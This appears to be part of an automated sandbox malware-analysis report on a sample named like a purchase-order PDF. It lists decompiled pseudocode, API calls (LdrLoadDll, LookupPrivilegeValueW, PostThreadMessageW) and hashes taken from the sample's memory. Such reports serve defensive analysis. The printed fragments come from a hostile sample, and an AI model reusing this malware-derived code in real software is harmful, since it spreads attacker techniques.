0x0040835d
0x0040836a
0x0040836c
0x0040836e
0x0040838b
0x0040838b
0x0040838d
0x00408392

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ae1178c7fec324d009f87f0136d07fa944887e8b766dfc85608e804858829a00
Instruction ID: 4e4273f2f59fc753791dc35edd13c069995cd733613e09d3cc0615af6dac5cdc
Opcode Fuzzy Hash: ae1178c7fec324d009f87f0136d07fa944887e8b766dfc85608e804858829a00
Instruction Fuzzy Hash: C501D871A8031877E720A6959C43FFF7B5C6B40B54F08012DFF04BB1C2D6A9690587EA

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE50( &_v67, 0, 0x3f);
				E0041C9F0( &_v68, 3);
				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00408310
0x0040831f
0x00408323
0x0040832e
0x0040833e
0x0040834e
0x00408353
0x0040835a
0x0040835d
0x0040836a
0x0040836c
0x0040836e
0x0040838b
0x0040838b
0x00000000
0x0040838d
0x00408392

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD5 Relevance: 1.5, APIs: 1, Instructions: 34
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0040ACD5(intOrPtr _a8) {
				char _v1;
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				intOrPtr _v16;
				char _v536;
				intOrPtr _t14;
				void* _t19;
				intOrPtr _t21;
				char* _t29;
				char* _t32;
				void* _t35;
				void* _t36;

				_t29 =  &_v1;
				asm("fbld tword [esi+0x12]");
				if(_t29 < 0) {
					L7:
					__eflags = _t14;
					if(_t14 == 0) {
						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
						_t14 = _v12;
					}
					return _t14;
				} else {
					asm("repe imul ebp, [esi-0x74aa3aac], 0xffffffec");
					_push(_t29);
					_t29 = _t32;
					_v8 =  &_v536;
					_t19 = E0041CC40( &_v12, 0x104, _a8);
					_t35 = _t32 - 0x214 + 0xc;
					if(_t19 != 0) {
						_t21 = E0041D060(__eflags, _v8);
						_t36 = _t35 + 4;
						__eflags = _t21;
						if(_t21 != 0) {
							E0041D2E0( &_v12, 0);
							_t36 = _t36 + 8;
						}
						_t14 = E0041B490(_v8);
						_v16 = _t14;
						goto L7;
					} else {
						return _t19;
					}
				}
			}

0x0040acd5
0x0040acd6
0x0040acd9
0x0040ad3c
0x0040ad3c
0x0040ad3e
0x0040ad52
0x0040ad54
0x0040ad54
0x0040ad5a
0x0040acdb
0x0040acdb
0x0040ace0
0x0040ace1
0x0040acfc
0x0040acff
0x0040ad04
0x0040ad09
0x0040ad13
0x0040ad18
0x0040ad1b
0x0040ad1d
0x0040ad25
0x0040ad2a
0x0040ad2a
0x0040ad31
0x0040ad39
0x00000000
0x0040ad0b
0x0040ad0e
0x0040ad0e
0x0040ad09

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 796323f370fa4475754ec7b1a8d10f715a192fc926ee15392a6327c5005b2ba0
Instruction ID: bdc878ef106f3a56429bda02c633b4ddbb7e2d0d239b4131948f2a420bdd4cde
Opcode Fuzzy Hash: 796323f370fa4475754ec7b1a8d10f715a192fc926ee15392a6327c5005b2ba0
Instruction Fuzzy Hash: 07F0BB71D4020DABDF10DB94D841FDAF3799F44308F0046DAED1C97580F1349B588B51

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7B2 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9d9e9eac524d1612925ac060264e7f27532233a64fa1065fe4f051bb24292a20
Instruction ID: 87f6bc1613d35dacd9628023668757cfe4edd262aa04486604ed6ac6346b7f8c
Opcode Fuzzy Hash: 9d9e9eac524d1612925ac060264e7f27532233a64fa1065fe4f051bb24292a20
Instruction Fuzzy Hash: 5CF0EDB22002146FEB20CF28CC81FE737A8EF48310F008119BA0C97282CA35F8018BF1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a66f
0x0041a677
0x0041a68d
0x0041a691

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A831 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 80034bffeca0097dba6f70cb36010c0aa27aa1959003ca47bb1f8643967fbc64
Instruction ID: 9566dbcdc444cc1d826bd2242d7e42ac8f9dc9d32cf1a2720b295ebd7f40422b
Opcode Fuzzy Hash: 80034bffeca0097dba6f70cb36010c0aa27aa1959003ca47bb1f8643967fbc64
Instruction Fuzzy Hash: 74E026B91082805FC712EF7498808DBB7A0BF85318700844EF82987B42C230D4168AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A6A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a6a3
0x0041a6ba
0x0041a6c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD3 Relevance: 1.5, APIs: 1, Instructions: 12
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD3(HMODULE* __eax, void* __edx) {
				intOrPtr _t7;
				void* _t10;

				LdrLoadDll(0, 0, _t10 - 8, __eax); // executed
				_t7 =  *((intOrPtr*)(_t10 - 0xc));
				return _t7;
			}

0x0040ad52
0x0040ad54
0x0040ad5a

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 40c72b40c4354f932b92d6aae3c72639742ca39b78f111908bd011dd5e538eef
Instruction ID: 39747e9a8f671ba6cc6988212794fd546b5af8f490dd27fe5748194d64ec3937
Opcode Fuzzy Hash: 40c72b40c4354f932b92d6aae3c72639742ca39b78f111908bd011dd5e538eef
Instruction Fuzzy Hash: D9C08C30A40109BFDA50CAC8CC82FA8F3A8EB09305F0042C5F90DEB2C0D570AA508752

Uniqueness

Uniqueness Score: -1.00%

Function 00A62AFA Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62B14

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af0d0878dd8192be7041f0de1adb429b364b99b5ddcb591350c816983fd0e7be
Instruction ID: d8594460edcec1b97b0fde66fc7ad12d2dc3046d16b4cd1fe2479748c7ed9079
Opcode Fuzzy Hash: af0d0878dd8192be7041f0de1adb429b364b99b5ddcb591350c816983fd0e7be
Instruction Fuzzy Hash: 28B09B719414C5C5D715D7604A0C7177A14A7D0741F25C061D1570681E8B3CC491E276

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A4F4A0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00A4F4A0(signed int __ecx, signed char __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed char _v72;
				signed int _v76;
				char _v80;
				void* _v84;
				char _v88;
				signed int _v92;
				intOrPtr _v96;
				void* _v100;
				signed int _v104;
				char _v108;
				signed char _v112;
				intOrPtr _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				char _v129;
				char _v130;
				intOrPtr _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				signed int _t132;
				signed int _t134;
				signed char* _t138;
				signed char* _t139;
				signed char* _t140;
				void* _t142;
				signed int _t144;
				signed int _t145;
				void* _t152;
				void* _t153;
				signed int _t156;
				signed int _t159;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				signed int _t191;
				signed char* _t192;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				void* _t206;
				unsigned int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				intOrPtr _t218;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				intOrPtr _t229;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t238;
				signed char _t241;
				void* _t244;
				signed int _t246;
				intOrPtr _t247;
				void* _t251;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t234 = __edx;
				_t209 = __ecx;
				_t254 = (_t252 & 0xfffffff8) - 0x84;
				_v8 =  *0xb1b370 ^ _t254;
				_t129 =  *[fs:0x18];
				_t241 = __ecx;
				_v112 = __edx;
				_v72 = __ecx;
				_v129 = 0;
				_v64 = _t129;
				_v108 = 0;
				if(__ecx == 0xb13390) {
					_v129 = 1;
					 *((intOrPtr*)(_t129 + 0xf84)) = 1;
				}
				if( *0xb15da8 != 0) {
					_push(0xc000004b);
					_push(0xffffffff);
					L00A62C40();
				}
				if( *0xb15a84 == 0) {
					_v120 = 0xb15a88;
				} else {
					_v120 = 0;
				}
				_t246 = _t241 + 0x10;
				if( *(_t241 + 0x10) == 0) {
					_t210 = _t209 | 0xffffffff;
					__eflags =  *0xb14ae2;
					_v124 = _t210;
					if( *0xb14ae2 != 0) {
						_push(0);
						_push(1);
						_push(0);
						_push(0x100003);
						_push( &_v124);
						_t132 = L00A62E00();
						__eflags = _t132;
						if(_t132 >= 0) {
							_t211 = _v124;
						} else {
							_t211 = _t210 | 0xffffffff;
							_v124 = _t210 | 0xffffffff;
						}
					}
					asm("lock cmpxchg [esi], ecx");
					__eflags = 0;
					if(0 != 0) {
						_t198 = _v124;
						__eflags = _t198 - 0xffffffff;
						if(_t198 != 0xffffffff) {
							_push(_t198);
							E00A62A50();
						}
					}
				}
				_t134 =  *_t241;
				if(_t134 == 0xffffffff) {
					_t134 = _t134 | 0xffffffff;
					__eflags =  *(_t241 + 0x14) & 0x01000000;
					if(( *(_t241 + 0x14) & 0x01000000) == 0) {
						_t211 = _t241;
						L00A4FCB0(_t241, _t234);
						_t134 =  *_t241;
					}
				}
				_v104 = 0;
				if(_t134 != 0xffffffff) {
					 *((intOrPtr*)(_t134 + 0x14)) =  *((intOrPtr*)(_t134 + 0x14)) + 1;
				}
				_t201 =  *_t246;
				_v68 = _t201;
				L9:
				while(1) {
					L9:
					if(L00A33BF0() != 0) {
						_t138 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t138 = 0x7ffe0382;
					}
					if( *_t138 != 0) {
						_t139 =  *[fs:0x30];
						__eflags = _t139[0x240] & 0x00000002;
						if((_t139[0x240] & 0x00000002) != 0) {
							_v16 = _t241;
							_v54 = 0x1722;
							_v24 =  *(_t241 + 0x14) & 0x00ffffff;
							_v28 =  *(_t241 + 4);
							_v20 =  *((intOrPtr*)(_t241 + 0xc));
							_t191 = ( *[fs:0x30])[0x50];
							__eflags = _t191;
							if(_t191 == 0) {
								L61:
								_t192 = 0x7ffe0382;
							} else {
								__eflags =  *_t191;
								if( *_t191 == 0) {
									goto L61;
								} else {
									_t192 = ( *[fs:0x30])[0x50] + 0x228;
								}
							}
							_t211 =  &_v60;
							_push( &_v60);
							_push(0x10);
							_push(0x20402);
							_push( *_t192 & 0x000000ff);
							L00A62F60();
						}
						goto L12;
						L24:
						if(_t140 < 0) {
							L00A78980(_t211, _t234, _t140);
							asm("int3");
							__eflags = _t246 != 4;
							if(_t246 != 4) {
								L47:
								L00A4F916(_v132,  &_v124);
								_t152 = 0;
							} else {
								_t238 =  *(_t241 + 4);
								_t153 =  *_t241;
								asm("lock cmpxchg8b [esi]");
								__eflags = _t153 -  *_t241;
								if(_t153 !=  *_t241) {
									goto L47;
								} else {
									__eflags = _t238 -  *(_t241 + 4);
									if(__eflags != 0) {
										goto L47;
									} else {
										_t152 = L00A4F875(_v132,  &_v124, _a8, _a12);
									}
								}
							}
							return _t152;
						} else {
							if(_v129 != 0) {
								 *((intOrPtr*)(_v64 + 0xf84)) = 0;
								_t156 = ( *[fs:0x30])[0x50];
								__eflags = _t156;
								if(_t156 == 0) {
									L81:
									_t140 = 0x7ffe0384;
								} else {
									__eflags =  *_t156;
									if( *_t156 == 0) {
										goto L81;
									} else {
										_t140 = ( *[fs:0x30])[0x50] + 0x22a;
									}
								}
								__eflags =  *_t140;
								if( *_t140 != 0) {
									_t140 =  *[fs:0x30];
									__eflags = _t140[0x240] & 0x00000004;
									if((_t140[0x240] & 0x00000004) != 0) {
										_t159 = ( *[fs:0x30])[0x50];
										__eflags = _t159;
										if(_t159 == 0) {
											L87:
											_t140 = 0x7ffe0385;
										} else {
											__eflags =  *_t159;
											if( *_t159 == 0) {
												goto L87;
											} else {
												_t140 = ( *[fs:0x30])[0x50] + 0x22b;
											}
										}
										__eflags =  *_t140 & 0x00000020;
										if(( *_t140 & 0x00000020) != 0) {
											_t140 = E00AA0117(0x1483, _t234, 0xffffffff, 0xffffffff, 0, 0);
										}
									}
								}
							}
							_pop(_t244);
							_pop(_t251);
							_pop(_t206);
							return L00A64B20(_t140, _t206, _v8 ^ _t254, _t234, _t244, _t251);
						}
					}
					L12:
					if(_t201 != 0xffffffff) {
						_push(_v120);
						_push(0);
						_push(_t201);
						_t140 = L00A629A0();
					} else {
						_t207 = _t241 + 4;
						_v76 =  &_v100 & 0xfffffffc;
						do {
							_t218 =  *[fs:0x18];
							_v100 = _t207;
							_v80 = 1;
							_v88 = 0;
							_v92 = 0;
							_v84 = 0;
							_v96 =  *((intOrPtr*)(_t218 + 0x24));
							_t208 = _v76;
							_t220 =  *((intOrPtr*)(_t218 + 0x30)) + 0x25c;
							_t169 = _t207 >> 0x00000005 & 0x0000007f;
							_v116 = _t220;
							_t235 =  *(_t220 + _t169 * 4);
							_v128 = _t220 + _t169 * 4;
							while(1) {
								_t172 = _t235 & 0xfffffffc;
								_t223 = _t235 & 0x00000003 | _t208;
								_v92 = _t172;
								if(_t172 != 0) {
									_v84 = 0;
									_t223 = _t223 | 0x00000002;
								} else {
									_v84 =  &_v100;
								}
								_t246 = _t223;
								_t173 = _t235;
								asm("lock cmpxchg [edi], esi");
								if(_t173 == _t235) {
									break;
								}
								_t235 = _t173;
							}
							_t241 = _v72;
							_t207 = _t241 + 4;
							if(((_t223 ^ _t235) & 0x00000002) != 0) {
								_t246 = _v128;
								_t236 =  *_t246;
								while(1) {
									_t226 = _t236 & 0xfffffffc;
									__eflags =  *(_t226 + 0x10);
									_v128 = _t226 + 0x10;
									if( *(_t226 + 0x10) == 0) {
										goto L31;
									}
									do {
										L31:
										_t183 = _t226;
										_t226 =  *(_t226 + 8);
										 *(_t226 + 0xc) = _t183;
										__eflags =  *(_t226 + 0x10);
									} while ( *(_t226 + 0x10) == 0);
									L32:
									 *_v128 =  *(_t226 + 0x10);
									__eflags = _t236 & 0x00000001;
									if((_t236 & 0x00000001) != 0) {
										_v130 = 1;
									} else {
										_v130 = 0;
										__eflags = _t236 & 0xfffffffc;
									}
									_t176 = _t236;
									asm("lock cmpxchg [esi], ecx");
									__eflags = _t176 - _t236;
									if(_t176 != _t236) {
										_t236 = _t176;
										_t226 = _t236 & 0xfffffffc;
										__eflags =  *(_t226 + 0x10);
										_v128 = _t226 + 0x10;
										if( *(_t226 + 0x10) == 0) {
											goto L31;
										}
										goto L32;
									}
									__eflags = _v130;
									if(_v130 != 0) {
										_t179 = _t176 & 0xfffffffc;
										__eflags = _t179;
										_v128 = _t179;
										if(_t179 != 0) {
											do {
												_t246 =  *(_t179 + 8);
												_t180 = _t179 + 0x14;
												 *_t180 = 2;
												__eflags =  *_t180;
												if( *_t180 == 0) {
													_push( *((intOrPtr*)(_v128 + 4)));
													E00A63080();
												}
												_t179 = _t246;
												_v128 = _t179;
												__eflags = _t246;
											} while (_t246 != 0);
										}
									}
									goto L19;
								}
							}
							L19:
							_t234 =  &_v100;
							_t229 = _v116;
							if( *_t207 != _v112) {
								L00A4F916(_t229, _t234);
								_t140 = 0;
							} else {
								_t140 = L00A4F875(_t229, _t234, _v120, 0);
							}
							if(_t140 == 0x102) {
								L70:
								_t202 = _v108;
								_t247 =  *[fs:0x18];
								_push(_t202);
								_t142 = E00A66300( *_v120,  *((intOrPtr*)(_v120 + 4)), 0xff676980, 0xffffffff);
								_push(_t234);
								L00AAEE00(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t142);
								_t144 =  *_t241;
								_t255 = _t254 + 0x18;
								__eflags = _t144 - 0xffffffff;
								if(_t144 == 0xffffffff) {
									_t145 = 0;
									__eflags = 0;
								} else {
									_t145 =  *((intOrPtr*)(_t144 + 0x14));
								}
								_push(_t145);
								_push(_t241);
								_push( *((intOrPtr*)(_t241 + 0xc)));
								_push( *((intOrPtr*)(_t247 + 0x24)));
								L00AAEE00(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t247 + 0x20)));
								_t256 = _t255 + 0x20;
								_t203 = _t202 + 1;
								_t211 = _t241;
								_v108 = _t203;
								_t246 = L00ABA7EE(_t241);
								__eflags = _t203 - 2;
								if(_t203 > 2) {
									__eflags = _t241 - 0xb13390;
									if(_t241 != 0xb13390) {
										__eflags = _t246 - _v104;
										if(_t246 == _v104) {
											L00ABA99E(_t211);
										}
									}
								}
								_push("RTL: Re-Waiting\n");
								_push(0);
								_push(0x65);
								_v104 = _t246;
								L00AAEE00();
								_t201 = _v68;
								_t254 = _t256 + 0xc;
								goto L9;
							} else {
								goto L22;
							}
							goto L23;
							L22:
							_t211 =  *_t207;
							_v112 = _t211;
						} while ((_t211 & 0x00000002) != 0);
					}
					L23:
					if(_t140 == 0x102) {
						goto L70;
					}
					goto L24;
				}
			}

0x00a4f4a0
0x00a4f4a0
0x00a4f4a8
0x00a4f4b5
0x00a4f4bc
0x00a4f4c5
0x00a4f4c7
0x00a4f4cb
0x00a4f4cf
0x00a4f4d4
0x00a4f4d8
0x00a4f4e6
0x00a8fe26
0x00a8fe2b
0x00a8fe2b
0x00a4f4f3
0x00a8fe3a
0x00a8fe3f
0x00a8fe41
0x00a8fe41
0x00a4f500
0x00a8fe4b
0x00a4f506
0x00a4f506
0x00a4f506
0x00a4f512
0x00a4f515
0x00a4f6f2
0x00a4f6f5
0x00a4f6fc
0x00a4f700
0x00a8fe58
0x00a8fe5a
0x00a8fe5c
0x00a8fe5e
0x00a8fe67
0x00a8fe68
0x00a8fe6d
0x00a8fe6f
0x00a8fe7d
0x00a8fe71
0x00a8fe71
0x00a8fe74
0x00a8fe74
0x00a8fe6f
0x00a4f708
0x00a4f70c
0x00a4f70e
0x00a8fe86
0x00a8fe8a
0x00a8fe8d
0x00a8fe93
0x00a8fe94
0x00a8fe94
0x00a8fe8d
0x00a4f70e
0x00a4f51b
0x00a4f520
0x00a4f719
0x00a4f71c
0x00a4f723
0x00a4f729
0x00a4f72b
0x00a4f730
0x00a4f730
0x00a4f723
0x00a4f526
0x00a4f531
0x00a4f533
0x00a4f533
0x00a4f536
0x00a4f538
0x00000000
0x00a4f540
0x00a4f540
0x00a4f547
0x00a8fea7
0x00a4f54d
0x00a4f54d
0x00a4f54d
0x00a4f555
0x00a8feb1
0x00a8feb7
0x00a8febe
0x00a8fec9
0x00a8fed0
0x00a8fedd
0x00a8fee4
0x00a8feeb
0x00a8fef8
0x00a8fefb
0x00a8fefd
0x00a8ff14
0x00a8ff14
0x00a8feff
0x00a8feff
0x00a8ff02
0x00000000
0x00a8ff04
0x00a8ff0d
0x00a8ff0d
0x00a8ff02
0x00a8ff1c
0x00a8ff20
0x00a8ff21
0x00a8ff23
0x00a8ff28
0x00a8ff29
0x00a8ff29
0x00000000
0x00a4f652
0x00a4f654
0x00a900c2
0x00a900c7
0x00a900c8
0x00a900cb
0x00a4f7f5
0x00a4f7fd
0x00a4f802
0x00a900d1
0x00a900d4
0x00a900d6
0x00a900df
0x00a900e3
0x00a900e5
0x00000000
0x00a900eb
0x00a900eb
0x00a4f7d7
0x00000000
0x00a4f7d9
0x00a4f7e7
0x00a4f7e7
0x00a4f7d7
0x00a900e5
0x00a4f7f2
0x00a4f65a
0x00a4f65f
0x00a9002a
0x00a9003a
0x00a9003d
0x00a9003f
0x00a90056
0x00a90056
0x00a90041
0x00a90041
0x00a90044
0x00000000
0x00a90046
0x00a9004f
0x00a9004f
0x00a90044
0x00a9005b
0x00a9005e
0x00a90064
0x00a9006a
0x00a90071
0x00a9007d
0x00a90080
0x00a90082
0x00a90099
0x00a90099
0x00a90084
0x00a90084
0x00a90087
0x00000000
0x00a90089
0x00a90092
0x00a90092
0x00a90087
0x00a9009e
0x00a900a1
0x00a900b7
0x00a900b7
0x00a900a1
0x00a90071
0x00a9005e
0x00a4f66c
0x00a4f66d
0x00a4f66e
0x00a4f679
0x00a4f679
0x00a4f654
0x00a4f55b
0x00a4f55e
0x00a8ff73
0x00a8ff77
0x00a8ff79
0x00a8ff7a
0x00a4f564
0x00a4f56b
0x00a4f56e
0x00a4f572
0x00a4f572
0x00a4f579
0x00a4f57d
0x00a4f585
0x00a4f58d
0x00a4f595
0x00a4f5a0
0x00a4f5a9
0x00a4f5ad
0x00a4f5b6
0x00a4f5b9
0x00a4f5bd
0x00a4f5c3
0x00a4f5d0
0x00a4f5d7
0x00a4f5da
0x00a4f5dc
0x00a4f5e2
0x00a4f683
0x00a4f68b
0x00a4f5e8
0x00a4f5ec
0x00a4f5ec
0x00a4f5f0
0x00a4f5f2
0x00a4f5f4
0x00a4f5fa
0x00000000
0x00000000
0x00a8ff33
0x00a8ff33
0x00a4f600
0x00a4f606
0x00a4f60c
0x00a4f693
0x00a4f697
0x00a4f6a0
0x00a4f6a2
0x00a4f6a5
0x00a4f6ac
0x00a4f6b0
0x00000000
0x00000000
0x00a4f6b2
0x00a4f6b2
0x00a4f6b2
0x00a4f6b4
0x00a4f6b7
0x00a4f6ba
0x00a4f6ba
0x00a4f6c0
0x00a4f6c7
0x00a4f6c9
0x00a4f6cc
0x00a4f737
0x00a4f6ce
0x00a4f6d0
0x00a4f6d5
0x00a4f6d5
0x00a4f6d8
0x00a4f6da
0x00a4f6de
0x00a4f6e0
0x00a4f740
0x00a4f6a2
0x00a4f6a5
0x00a4f6ac
0x00a4f6b0
0x00000000
0x00000000
0x00000000
0x00a4f6b0
0x00a4f6e2
0x00a4f6e7
0x00a8ff3a
